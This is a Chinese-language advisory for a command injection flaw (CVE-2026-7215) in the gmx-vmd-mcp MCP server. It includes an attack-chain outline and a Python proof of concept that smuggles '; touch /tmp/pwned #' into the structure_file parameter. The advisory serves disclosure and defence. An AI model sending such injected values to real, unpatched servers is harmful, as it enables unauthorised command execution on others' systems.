CVE-2026-7215 CVSS 7.3 高危

CVE-2026-7215: gmx-vmd-mcp命令注入漏洞

披露日期: 2026-04-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7215

漏洞类型

命令注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

egtai gmx-vmd-mcp

漏洞概述

egtai gmx-vmd-mcp 0.1.0及以下版本存在严重安全漏洞。该漏洞源于VMD启动处理组件中的launch_vmd_gui_tool函数未能正确过滤用户输入。攻击者可远程操纵structure_file或trajectory_file参数，注入恶意操作系统命令。由于无需用户交互和认证，攻击者可利用此漏洞执行任意代码，严重威胁系统的机密性、完整性和可用性。目前官方尚未发布修复补丁。

技术细节

该漏洞位于egtai/gmx-vmd-mcp项目的mcp_server.py文件中，具体影响launch_vmd_gui_tool函数。此函数负责启动VMD图形界面工具并处理文件路径。开发者在编写该功能时，未对用户提供的structure_file和trajectory_file参数进行严格的输入验证和清洗，直接将其拼接到系统命令中执行。这种不安全的编程模式导致了命令注入漏洞。攻击者可以通过在参数中插入Shell元字符（如 `;`, `|`, `&&` 或 `$(...)`），欺骗后端服务器执行攻击者指定的任意系统指令。鉴于该漏洞允许远程利用且无需身份认证，攻击者一旦发现暴露的服务，即可轻易获取服务器权限，进行数据窃取、服务中断或横向移动。目前项目方尚未对此漏洞做出响应，风险处于未缓解状态。

攻击链分析

STEP 1

侦察

攻击者扫描互联网或内网，寻找运行egtai gmx-vmd-mcp服务（通常暴露特定端口或API路径）的目标主机。

STEP 2

武器化

攻击者构造包含恶意Shell命令的HTTP请求Payload，重点针对structure_file或trajectory_file参数进行注入。

STEP 3

投递

攻击者向目标服务器的MCP接口发送构造好的恶意POST请求。

STEP 4

利用

服务器端的launch_vmd_gui_tool函数接收到参数，未经过滤直接拼接进系统命令并执行，导致注入的恶意代码在服务器上运行。

STEP 5

安装与行动

恶意命令执行后，攻击者可能建立反向Shell，写入Webshell，或窃取数据，从而完全控制受影响系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# Target URL (Example)
# The exploit targets the endpoint that calls launch_vmd_gui_tool
target_url = "http://target-host:port/api/launch_vmd"

# Malicious payload to inject a command
# This attempts to create a file named 'pwned' in the /tmp directory
# The injection uses a semicolon to chain commands
command_injection = "; touch /tmp/pwned #"

# Construct the payload with the injection in the structure_file parameter
payload_data = {
    "structure_file": f"input.pdb{command_injection}",
    "trajectory_file": "input.xtc"
}

headers = {
    "Content-Type": "application/json"
}

try:
    # Send the malicious request
    response = requests.post(target_url, data=json.dumps(payload_data), headers=headers)
    
    if response.status_code == 200:
        print("[+] Request sent successfully. Check if the command was executed.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except Exception as e:
    print(f"[!] An error occurred: {e}")

影响范围

egtai gmx-vmd-mcp <= 0.1.0

防御指南

临时缓解措施

在官方发布修复版本前，建议暂停使用该组件的VMD启动功能，或通过网络ACL（访问控制列表）严格限制对服务端口的访问，仅允许受信任的客户端连接。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7215
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7215
3 Details https://www.cvedetails.com/cve/CVE-2026-7215/
4 VulDB https://vuldb.com/cve/CVE-2026-7215
5 Link https://github.com/egtai/gmx-vmd-mcp/
6 Link https://github.com/egtai/gmx-vmd-mcp/issues/2
7 Link https://vuldb.com/submit/802087
8 Link https://vuldb.com/vuln/359815
9 Link https://vuldb.com/vuln/359815/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表